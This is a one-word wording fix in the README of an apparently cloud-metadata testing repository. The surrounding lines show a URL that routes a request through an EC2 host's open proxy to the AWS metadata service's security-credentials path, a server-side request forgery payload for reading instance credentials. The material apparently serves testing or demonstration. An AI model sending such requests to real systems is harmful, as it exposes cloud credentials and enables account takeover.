gahlberg/cloud-instance-metadata-test-tools/README.md

 ### OK the proxy service is verified as working...

-### In a browser let's take what we were able to find with AWS Instance meta-data from the python interpreter and put in a browser:
+### In a browser let's take what we were able to find with AWS Instance meta-data from the python interpreter and put into a browser:
 	http://ec2-54-86-5-206.compute-1.amazonaws.com:8080/?url=http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance

 #### And the same goes here!